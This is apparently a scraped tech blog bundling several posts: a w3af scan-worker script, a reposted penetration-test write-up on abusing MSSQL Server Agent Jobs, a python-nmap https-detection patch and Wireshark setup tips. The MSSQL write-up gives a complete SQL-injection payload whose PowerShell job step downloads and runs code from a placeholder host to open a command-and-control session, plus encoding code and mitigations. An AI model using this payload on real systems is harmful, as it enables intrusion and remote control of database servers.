    profile = db.Column(db.String(32))
    status = db.Column(db.String(32))
    deleted = db.Column(db.Boolean, default=False)
    run_instance = db.Column(db.Unicode(128))
    num_vulns = db.Column(db.Integer)
    vulns = db.orm.relationship("Vulnerability", back_populates="scan")
    user_id = db.Column(db.String(40))

    def __repr__(self):
        return '<Scan %d>' % self.id

# vuln
class Vulnerability(Base):
    __tablename__ = 'vulns'
    id = db.Column(db.Integer, primary_key = True)
    relative_id = db.Column(db.Integer) # relative to scans
    stored_json = db.Column(db.Text) # inefficient, might fix later
    deleted = db.Column(db.Boolean, default=False)
    false_positive = db.Column(db.Boolean, default=False)
    scan_id = db.Column(db.Integer, db.ForeignKey('scans.id'))
    scan = db.orm.relationship("Scan", back_populates="vulns")

    def __init__(self, id, json, scan_id):
        self.relative_id = id
        self.stored_json = json
        self.scan_id = scan_id

    def __repr__(self):
        return '<Vuln %d>' % self.id

engine = db.create_engine(os.environ.get('SQLALCHEMY_CONN_STRING'))
Session = sessionmaker(bind=engine)
sess = Session()

credentials = pika.PlainCredentials(os.environ.get('TASKQUEUE_USER'), os.environ.get('TASKQUEUE_PASS'))
con = pika.BlockingConnection(pika.ConnectionParameters(host=os.environ.get('TASKQUEUE_HOST'),credentials=credentials))

channelTask = con.channel()
channelTask.queue_declare(queue='task', durable=True)

channelResult = con.channel()
channelResult.queue_declare(queue='result')

# URL to w3af REST API interface instance
server = sys.argv[1]

vul_cnt = 0

def freeServer(sv, href):
    r = requests.delete(sv + href)
    print r.text

def isFree(sv):
    r = requests.get(sv + '/scans/')
    print r.text
    items = json.loads(r.text)['items']
    if len(items) == 0:
        return True
    # number of items > 0
    item = items[0]
    if item['status'] == 'Stopped':
        freeServer(sv, item['href'])
        return True
    return False

def sendTaskDone(server, href):
    data = {}
    data['server'] = server
    data['href'] = href
    message = json.dumps(data)
    channelResult.basic_publish(exchange='',
                        routing_key='result',
                        body=message)

def scann(target):
    data = {'scan_profile': file('../core/w3af/profiles/full_audit.pw3af').read(),
        'target_urls': [target]}
    response = requests.post(server + '/scans/',
                        data=json.dumps(data),
                        headers={'content-type': 'application/json'})

    print response.status_code
    print response.text
    print response.headers

def getVul(sv, href):
    r = requests.get(sv + href)
    #db.insert(r.text)

def getVulsList(sv, href):
    global vul_cnt
    r = requests.get(sv + href + 'kb')
    vuls = json.loads(r.text)['items']
    l = len(vuls)
    if l > vul_cnt:
        for vul in vuls:
            if vul['id'] >= vul_cnt:
                getVul(sv, vul['href'])
    vul_cnt = l
        
# on receiving message
def callback(ch, method, properties, body):
    print('Get message %s' % body)
    task = json.loads(body)
    scann(task['target'])
    task_done = False
    time.sleep(1)
    step = 0
    last_vuln_len = 0
    sv = server
    scan = sess.query(Scan).filter_by(id=task['scan_id']).first()
    # tell gateway server that the task is loaded on this instance
    scan.run_instance = server
    while True:
        # update scan status; check if freed
        list_scans = json.loads(requests.get(sv + '/scans/').text)['items'] # currently just 1
        if (len(list_scans) == 0): # freed
            break
        currentpath = list_scans[0]['href']
        # update vuln list
        r = requests.get(sv + currentpath + '/kb/')
        items = json.loads(r.text)['items'] 
        for i in xrange(last_vuln_len, len(items)):
            v = Vulnerability(i+1, requests.get(sv + items[i]['href']).text, task['scan_id'])
            sess.add(v)
            sess.commit()
            scan.num_vulns += 1
        last_vuln_len = len(items)
        scan.status = list_scans[0]['status']
        sess.commit()
        if scan.status == 'Stopped' and not task_done:
            task_done = True
            requests.delete(sv + currentpath)
        step += 1
        if step == 9:
            con.process_data_events() # MQ heartbeat
            step = 0
        time.sleep(5) # avoid over consumption
    # TODO: send mails to list when the scan is stopped or completed
    print 'Done'
    ch.basic_ack(delivery_tag=method.delivery_tag)
#print getServerStatus(server)


channelTask.basic_qos(prefetch_count=1)
channelTask.basic_consume(callback, queue='task')

print '[*] Waiting for message'

channelTask.start_consuming()

 

MSSQL Agent Jobs for Command Execution

发布时间:October 7, 2016 // 分类:运维工作,工作日志,linux,windows // No Comments

The primary purpose of the Optiv attack and penetration testing (A&P) team is to simulate adversarial threat activity in an effort to test the efficacy of defensive security controls. Testing is meant to assess many facets of organizational security programs by using real-world attack scenarios. This type of assessment helps identify areas of strength, or areas of improvement regarding organizations' IT security processes, personnel and systems.

There exists a cat-and-mouse game in IT security, a never-ending arms race. Malicious actors implement new attacks; defensive controls are deployed to detect and deter those same attacks. It behooves organizations to attempt to be proactive in their defensive posture, and identify new methods of attack and preemptively put controls in place to stop them. Optiv A&P strives to maintain technical expertise in both the offensive and attack arena, along with the defensive methods used to detect and prevent attacks. To stay relevant and effective in this ever-changing threat landscape, it is paramount that organizations that specialize in assessing organizational security posture stay relevant to the tactics, techniques and procedures (TTPs) that are used by genuine threat actors. Optiv engages in proactive threat research to identify TTPs that could be used by threat actors to compromise systems or data.

Attacks that Stay Below the Radar

A goal of many attackers is to implement campaigns that go undetected. The longer an organization is unaware of a breach condition, the more time an attacker has to identify and exfiltrate sensitive information, and use the compromised environment as a pivot point for more nefarious activity.

Optiv A&P implements advanced attacks in an effort to identify gaps in detective capabilities, and assist organizations in detecting the attacks.

A recent example of this activity is abusing native functionality with Microsoft SQL Server (MSSQL) to gain command and control of database servers using MSSQL Server Agent Jobs. 

Microsoft SQL Server Agent

The MSSQL Server Agent is a Windows service that can be used to perform automated tasks. Agent jobs can be scheduled and run under the context of the MSSQL Server Agent service. However, using agent proxy capabilities, the jobs can be run with different credentials as well.

The Attack

During a recent engagement, a SQL injection condition was identified in a web application that was using MSSQL Server 2012. At the request of the client, Optiv performed the assessment in a surreptitious manner, making every effort to avoid detection. Optiv devised a way to take advantage of native MSSQL Server functionality to execute commands on the underlying Windows operating system. Also, the xp_cmdshell stored procedure had been disabled, and the ability to create custom stored procedures had also been limited.

Many monitoring or detection systems generate alerts when a commonly abused MSSQL stored procedure (xp_cmdshell) is used during an attack. The use of xp_cmdshell by attackers and penetration testers has led many organizations to disable it, limit its use, and tune alerting systems to watch for it.

Optiv identified a scenario wherein the MSSQL Server Agent could be leveraged to gain command execution on the target database server. However, the server had to meet several conditions:

  • The MSSQL Server Agent service needs to be running.
  • The account that is being used must have permissions to create and execute agent jobs (in this case the database account that was running the service that had a SQL injection condition). 

Optiv identified two MSSQL Agent Job subsystems that could be advantageous to attackers: the CmdExec and PowerShell subsystems. These two features can execute operating systems commands, and PowerShell respectively.

Optiv used the SQL injection entry point to create and execute the agent job. The job's command was PowerShell code that created a connection to an Optiv controlled IP address and downloaded additional PowerShell instructions that established an interactive command and control session between the database server, and the Optiv controlled server.

Here is the SQL syntax breakdown. Note, in the below download-string command, the URI is between two single quotes, not double quotes. This is to escape single quotes within SQL.

USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://IP_OR_HOSTNAME/file''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';

The above string is for easier copying and pasting, if you want to recreate this attack scenario.

The below quickly shows a demo on how to weaponize this attack.

The SQL syntax is URL encoded. In this specific instance the attack is being sent via an HTTP GET request, hence the necessity to URL encode the payload.
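
As an illustration (not the exact tooling used on the engagement), URL-encoding such a payload is straightforward; the target URL and parameter name below are hypothetical:

# -*- coding: utf-8 -*-
# Sketch: URL-encode the agent-job payload for delivery in a GET parameter.
# The URL and vulnerable parameter name are hypothetical placeholders.
import urllib

payload = (" USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ;"
           " EXEC dbo.sp_start_job N'test_powershell_job1';")

# an empty safe-set forces spaces, quotes and semicolons to be encoded
encoded = urllib.quote(payload, safe='')
print('http://victim.example/page.asp?id=1' + encoded)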

The request, with the SQL injection payload, to an HTTP GET parameter that is vulnerable to SQL injection is shown. Note the %20 (space character) added to the beginning of the payload.

Once the payload is run we can see a command and control session is established, running with the SQLSERVERAGENT account's privileges.

On the victim SQL server we can see the SQL Agent job has been created.

The below video demonstrates the full attack.

Attack Post Mortem

This attack can be leveraged to run MSSQL Server Agent jobs on other MSSQL servers, if the Agent service on the victim is configured to use an account with permissions to other MSSQL servers. Also, Agent jobs can be scheduled, and may be used as an evasive means to maintain a persistent connection to victim MSSQL servers.

In some instances, if the MSSQL Server Agent service is configured with an account that has more privileges than that of the database user, for example an Active Directory domain service account, this attack can be used by an attacker to escalate their privileges. 

Mitigation

General web application hygiene should be used to prevent attack vectors like SQL injection. Use prepared statements in SQL queries within web applications, and abstracting application logic from backend databases. Employ web application firewalls to detect and block attacks on applications.

Internal systems that do not need to communicate directly with Internet hosts should be disallowed from doing so. This can prevent command and control channels from being established between internal assets, and attacker controlled endpoints. Employ strict network egress filtering.

MSSQL Server Agent jobs can be abused by any attacker that has the ability to execute SQL queries on a database server. To specifically limit the attack surface of MSSQL Server Agent jobs ensure that databases are running under the context of user accounts with the concept of least privilege. If the account that a database is running under does not have permissions to create and start MSSQL Server Agent jobs this attack is negated. Also, if the MSSQL Server Agent service is not in use it should be disabled. 

A python-nmap Pitfall: https Reported as http

Published: September 1, 2016 // Categories: Work Log, Ops, Dev Notes, linux, python, windows, Misc // No Comments

Today, while using python-nmap to scan and store results, I noticed https ports were being flatly reported as http.

I retested carefully several times with the same result. Refusing to let it go, I examined the scan arguments and found that python-nmap forcibly appends the -oX - flag when it invokes nmap.

A normal scan looks like:

nmap 45.33.49.119 -p T:443 -Pn -sV --script=banner

But run through python-nmap it becomes:

nmap -oX - 45.33.49.119 -p T:443 -Pn -sV --script=banner
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/local/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.12 scan initiated Thu Sep  1 00:02:07 2016 as: nmap -oX - -p T:443 -Pn -sV --script=banner 45.33.49.119 -->
<nmaprun scanner="nmap" args="nmap -oX - -p T:443 -Pn -sV --script=banner 45.33.49.119" start="1472659327" startstr="Thu Sep  1 00:02:07 2016" version="7.12" xmloutputversion="1.04">
<scaninfo type="connect" protocol="tcp" numservices="1" services="443"/>
<verbose level="0"/>
<debugging level="0"/>
<host starttime="1472659328" endtime="1472659364"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="45.33.49.119" addrtype="ipv4"/>
<hostnames>
<hostname name="ack.nmap.org" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="443"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.6" extrainfo="(CentOS)" tunnel="ssl" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.6</cpe></service><script id="http-server-header" output="Apache/2.4.6 (CentOS)"><elem>Apache/2.4.6 (CentOS)</elem>
</script></port>
</ports>
<times srtt="191238" rttvar="191238" to="956190"/>
</host>
<runstats><finished time="1472659364" timestr="Thu Sep  1 00:02:44 2016" elapsed="36.65" summary="Nmap done at Thu Sep  1 00:02:44 2016; 1 IP address (1 host up) scanned in 36.65 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

After formatting, the content looks like this:

One attribute stands out: tunnel. But looking through https://bitbucket.org/xael/python-nmap/raw/8ed37a2ac20d6ef26ead60d36f739f4679fcdc3e/nmap/nmap.py, nothing in the parser is ever associated with it:

for dport in dhost.findall('ports/port'):
                # protocol
                proto = dport.get('protocol')
                # port number converted as integer
                port =  int(dport.get('portid'))
                # state of the port
                state = dport.find('state').get('state')
                # reason
                reason = dport.find('state').get('reason')
                # name, product, version, extra info and conf if any
                name = product = version = extrainfo = conf = cpe = ''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'cpe': cpe}

The obvious fix is to extract tunnel alongside name and match on both. So patch lines 410-440:

                name = product = version = extrainfo = conf = cpe = tunnel =''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')
                    if dname.get('tunnel'):
                        tunnel = dname.get('tunnel')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'tunnel':tunnel,
                                                          'cpe': cpe}

And add the new tunnel field to the CSV header at lines 654-670:

        csv_ouput = csv.writer(fd, delimiter=';')
        csv_header = [
            'host',
            'hostname',
            'hostname_type',
            'protocol',
            'port',
            'name',
            'state',
            'product',
            'extrainfo',
            'reason',
            'version',
            'conf',
            'tunnel',
            'cpe'
            ]

Then import the patched file and apply the check when reading results: if name is http and tunnel is ssl at the same time, report the port as https.

        # excerpt from the scan loop; `domain` comes from the surrounding code
        for targetHost in scanner.all_hosts():
            if scanner[targetHost].state() == 'up' and scanner[targetHost]['tcp']:
                for targetport in scanner[targetHost]['tcp']:
                    #print(scanner[targetHost]['tcp'][int(targetport)])
                    if scanner[targetHost]['tcp'][int(targetport)]['state'] == 'open' and scanner[targetHost]['tcp'][int(targetport)]['product']!='tcpwrapped':
                        # with the patch: ssl-tunneled http is really https
                        if scanner[targetHost]['tcp'][int(targetport)]['name']=='http' and scanner[targetHost]['tcp'][int(targetport)]['tunnel'] == 'ssl':
                            scanner[targetHost]['tcp'][int(targetport)]['name'] = 'https'
                        print(domain+'\t'+targetHost+'\t'+str(targetport) + '\t' + scanner[targetHost]['tcp'][int(targetport)]['name'] + '\t' + scanner[targetHost]['tcp'][int(targetport)]['product']+scanner[targetHost]['tcp'][int(targetport)]['version'])
                        #if scanner[targetHost]['tcp'][int(targetport)]['name'] in ["https","http"]:

Scan results with the patched module:
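
For completeness, a minimal sketch of driving the patched module; the tunnel key only exists once the patch above is applied (the target is the same test IP used earlier):

# -*- coding: utf-8 -*-
# Sketch: use the patched python-nmap and read back the new 'tunnel' field.
import nmap  # the locally patched copy

scanner = nmap.PortScanner()
scanner.scan('45.33.49.119', 'T:443', arguments='-Pn -sV --script=banner')

for host in scanner.all_hosts():
    svc = scanner[host]['tcp'][443]
    name = svc['name']
    # with the patch, ssl-tunneled http is reported as https
    if name == 'http' and svc.get('tunnel') == 'ssl':
        name = 'https'
    print('%s:443 %s %s' % (host, name, svc['product']))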

Fixing Wireshark Not Finding Network Interfaces on Mac OS

Published: August 17, 2016 // Categories: Work Log, Ops, linux, Reposts // No Comments

1. Wireshark depends on X11.
2. Mac OS X does not install X11 by default.
So before installing Wireshark on a Mac, install X11 from the Mac OS install DVD.
After installing, run echo $DISPLAY and check whether it prints:
:0.0
If it doesn't, run:
DISPLAY=:0.0; export DISPLAY
Also, due to a Mac OS bug, after every reboot you must run these two commands before Wireshark can find the interfaces:
sudo chgrp admin /dev/bpf*
sudo chmod g+rw /dev/bpf*
Another approach, which may not work, is to copy the ChmodBPF folder from the Wireshark install image into /Library/StartupItems/; my machine keeps raising security-settings complaints, so for now I fix the permissions by hand each time. If you only decode captures rather than sniff, you don't need to touch the bpf permissions at all.
Troubleshooting Wireshark startup:
Go to /Application/WireShark.app/Contents/MacOS, run WireShark, and follow the messages it prints.
